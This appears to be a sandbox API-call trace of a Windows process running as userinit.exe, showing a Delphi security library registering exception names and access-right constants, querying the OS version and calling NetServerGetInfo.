[0130.567] SysReAllocStringLen (in: pbstr=0x298f798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x298f798*="EJwsclEndOfStream") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x298f780*="EJwsclClassTypeMismatch") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x298f768*="EJwsclInvalidHandle") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x298f750*="EJwsclInvalidIndex") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x298f738*="EJwsclInvalidSession") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x298f720*="EJwsclMissingEvent") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x298f708*="EJwsclInvalidPointerType") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x298f6f0*="EJwsclCreateProcessFailed") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x298f6d8*="EJwsclNilPointer") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x298f6c0*="EJwsclUnimplemented") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x298f6a8*="EJwsclInitWellKnownException") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x298f690*="EJwsclKeyApiException") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x298f678*="EJwsclKeyException") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x298f660*="EJwsclHashApiException") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x298f648*="EJwsclHashException") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x298f630*="EJwsclCSPApiException") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x298f618*="EJwsclCSPException") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x298f600*="EJwsclTerminalSessionException") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x298f5e8*="EJwsclTerminalServiceNecessary") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x298f5d0*="EJwsclTerminalServiceException") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x298f5b8*="EJwsclTerminalServerConnectException") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x298f5a0*="EJwsclTerminalServerException") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x298f588*="EJwsclCryptUnsupportedException") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x298f570*="EJwsclCryptApiException") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x298f558*="EJwsclCryptException") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x298f540*="EJwsclOSError") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x298f528*="EJwsclResourceInitFailed") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x298f510*="EJwsclResourceUnequalCount") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x298f4f8*="EJwsclResourceNotFound") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x298f4e0*="EJwsclResourceException") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x298f4c8*="EJwsclFailedAddACE") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x298f4b0*="EJwsclUnsupportedACE") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x298f498*="EJwsclOpenWindowStationException") returned 1
[0130.567] SysReAllocStringLen (in: pbstr=0x298f480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x298f480*="EJwsclWindowStationException") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x298f468*="EJwsclCloseDesktopException") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x298f450*="EJwsclCreateDesktopException") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x298f438*="EJwsclOpenDesktopException") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x298f420*="EJwsclDesktopException") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x298f408*="EJwsclSACLAccessDenied") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x298f3f0*="EJwsclAccessDenied") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x298f3d8*="EJwsclLSAException") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x298f3c0*="ESetOwnerException") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x298f3a8*="ESetSecurityException") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x298f390*="EJwsclInvalidParentDescriptor") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x298f378*="EJwsclInvalidKeyPath") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x298f360*="EJwsclInvalidGenericAccessMask") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x298f348*="EJwsclAdaptSecurityInfoException") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x298f330*="EJwsclThreadException") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x298f318*="EJwsclInvalidObjectException") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x298f300*="EJwsclSecurityObjectException") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x298f2e8*="EJwsclHashMismatch") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x298f2d0*="EJwsclStreamHashException") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x298f2b8*="EJwsclStreamInvalidMagicException") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x298f2a0*="EJwsclStreamSizeException") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x298f288*="EJwsclStreamException") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x298f270*="EJwsclNoSuchLogonSession") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x298f258*="EJwsclInvalidFlagsException") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x298f240*="EJwsclProcessNotFound") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x298f228*="EJwsclInvalidParameterException") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x298f210*="EJwsclInvalidPathException") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x298f1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x298f1e0*="EJwsclInvalidRevision") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x298f1c8*="EJwsclInvalidAceMismatch") returned 1
[0130.568] SysReAllocStringLen (in: pbstr=0x298f1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x298f1b0*="EJwsclRevisionMismatchException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298f198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x298f198*="EJwsclInvalidACEException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298f180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x298f180*="EJwsclReadOnlyPropertyException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298f168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x298f168*="EJwsclDuplicateListEntryException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298f150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x298f150*="EJwsclIndexOutOfBoundsException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298f138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x298f138*="EJwsclInvalidSidAuthorityValue") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298f120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x298f120*="EJwsclInvalidKnownSIDException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298f108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x298f108*="EJwsclInvalidComputer") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298f0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x298f0f0*="EJwsclInvalidGroupSIDException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298f0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x298f0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298f0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x298f0c0*="EJwsclInvalidSIDException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298f0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x298f0a8*="EJwsclInvalidSecurityListException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298f090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x298f090*="EJwsclInvalidMandatoryLevelException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298f078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x298f078*="EJwsclEmptyACLException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298f060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x298f060*="EJwsclNILParameterException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298f048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x298f048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298f030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x298f030*="EJwsclInvalidObjectArrayException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298f018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x298f018*="EJwsclProcessIdNotAvailable") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298f000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x298f000*="EJwsclWinCallFailedException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298efe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x298efe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298efd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x298efd0*="EJwsclNotImplementedException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298efb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x298efb8*="EJwsclAccessTypeException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298efa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x298efa0*="EJwsclAdjustPrivilegeException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298ef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x298ef88*="EJwsclPrivilegeCheckException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298ef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x298ef70*="EJwsclPrivilegeNotFoundException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298ef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x298ef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298ef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x298ef40*="EJwsclPrivilegeException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298ef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x298ef28*="EJwsclNotEnoughMemory") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298ef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x298ef10*="EJwsclInvalidTokenHandle") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298eef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x298eef8*="EJwsclNoThreadTokenAvailable") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298eee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x298eee0*="EJwsclDuplicateTokenException") returned 1
[0130.569] SysReAllocStringLen (in: pbstr=0x298eec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x298eec8*="EJwsclInvalidOwnerException") returned 1
[0130.570] SysReAllocStringLen (in: pbstr=0x298eeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x298eeb0*="EJwsclInvalidPrimaryToken") returned 1
[0130.570] SysReAllocStringLen (in: pbstr=0x298ee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x298ee98*="EJwsclTokenPrimaryException") returned 1
[0130.570] SysReAllocStringLen (in: pbstr=0x298ee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x298ee80*="EJwsclTokenImpersonationException") returned 1
[0130.570] SysReAllocStringLen (in: pbstr=0x298ee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x298ee68*="EJwsclTokenInformationException") returned 1
[0130.570] SysReAllocStringLen (in: pbstr=0x298ee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x298ee50*="EJwsclSharedTokenException") returned 1
[0130.570] SysReAllocStringLen (in: pbstr=0x298ee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x298ee38*="EJwsclOpenProcessTokenException") returned 1
[0130.570] SysReAllocStringLen (in: pbstr=0x298ee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x298ee20*="EJwsclOpenThreadTokenException") returned 1
[0130.570] SysReAllocStringLen (in: pbstr=0x298ee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x298ee08*="EJwsclSecurityException") returned 1
[0130.570] SysReAllocStringLen (in: pbstr=0x298edf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x298edf0*="Exception") returned 1
[0130.570] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.570] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0130.570] GetVersionExA (in: lpVersionInformation=0x8f7b4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0xb0000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\xdc\xf7\x08") | out: lpVersionInformation=0x8f7b4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0130.570] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0130.570] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0130.576] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0130.576] NetServerGetInfo (in: servername="", level=0x65, bufptr=0x8f838 | out: bufptr=0x8f838) returned 0x0
[0130.580] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0130.580] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0130.580] NetApiBufferFree (Buffer=0xd1d00) returned 0x0
[0130.580] SetErrorMode (uMode=0x8000) returned 0x1
[0130.580] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0130.580] SetErrorMode (uMode=0x1) returned 0x8000
[0130.580] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0130.582] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0130.583] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0130.585] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0130.586] SysReAllocStringLen (in: pbstr=0x298ec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x298ec40*="DELETE") returned 1
[0130.586] SysReAllocStringLen (in: pbstr=0x298ec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x298ec30*="READ_CONTROL") returned 1
[0130.586] SysReAllocStringLen (in: pbstr=0x298ec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x298ec20*="WRITE_OWNER") returned 1
[0130.586] SysReAllocStringLen (in: pbstr=0x298ec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x298ec10*="WRITE_DAC") returned 1
[0130.586] SysReAllocStringLen (in: pbstr=0x298ec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x298ec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0130.586] SysReAllocStringLen (in: pbstr=0x298ebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x298ebf0*="FILE_READ_ATTRIBUTES") returned 1
[0130.586] SysReAllocStringLen (in: pbstr=0x298ebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x298ebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0130.586] SysReAllocStringLen (in: pbstr=0x298ebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x298ebd0*="FILE_WRITE_DATA") returned 1
[0130.586] SysReAllocStringLen (in: pbstr=0x298ebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x298ebc0*="FILE_READ_DATA") returned 1
[0130.586] SysReAllocStringLen (in: pbstr=0x298ebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x298ebb0*="FILE_ALL_ACCESS") returned 1
[0130.586] SysReAllocStringLen (in: pbstr=0x298eba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x298eba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.586] SysReAllocStringLen (in: pbstr=0x298eb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x298eb90*="STANDARD_RIGHTS_WRITE") returned 1
[0130.586] SysReAllocStringLen (in: pbstr=0x298eb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x298eb80*="STANDARD_RIGHTS_READ") returned 1
[0130.586] SysReAllocStringLen (in: pbstr=0x298eb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x298eb70*="STANDARD_RIGHTS_ALL") returned 1
[0130.586] SysReAllocStringLen (in: pbstr=0x298eb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x298eb50*="DELETE") returned 1
[0130.586] SysReAllocStringLen (in: pbstr=0x298eb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x298eb40*="READ_CONTROL") returned 1
[0130.586] SysReAllocStringLen (in: pbstr=0x298eb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x298eb30*="WRITE_OWNER") returned 1
[0130.586] SysReAllocStringLen (in: pbstr=0x298eb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x298eb20*="WRITE_DAC") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298eb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x298eb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298eb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x298eb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298eaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x298eaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298eae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x298eae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298ead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x298ead0*="TOKEN_QUERY_SOURCE") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298eac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x298eac0*="TOKEN_QUERY") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298eab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x298eab0*="TOKEN_IMPERSONATE") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298eaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x298eaa0*="TOKEN_DUPLICATE") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298ea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x298ea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298ea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x298ea80*="TOKEN_ALL_ACCESS") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298ea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x298ea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298ea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x298ea60*="STANDARD_RIGHTS_WRITE") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298ea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x298ea50*="STANDARD_RIGHTS_READ") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298ea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x298ea40*="STANDARD_RIGHTS_ALL") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298ea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x298ea30*="DELETE") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298ea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x298ea20*="READ_CONTROL") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298ea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x298ea10*="WRITE_OWNER") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298ea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x298ea00*="WRITE_DAC") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298e9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x298e9f0*="TIMER_MODIFY_STATE") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298e9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x298e9e0*="TIMER_QUERY_STATE") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298e9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x298e9d0*="TIMER_ALL_ACCESS") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298e9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x298e9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298e9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x298e9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298e9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x298e9a0*="STANDARD_RIGHTS_READ") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298e990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x298e990*="STANDARD_RIGHTS_ALL") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298e980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x298e980*="DELETE") returned 1
[0130.587] SysReAllocStringLen (in: pbstr=0x298e970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x298e970*="READ_CONTROL") returned 1
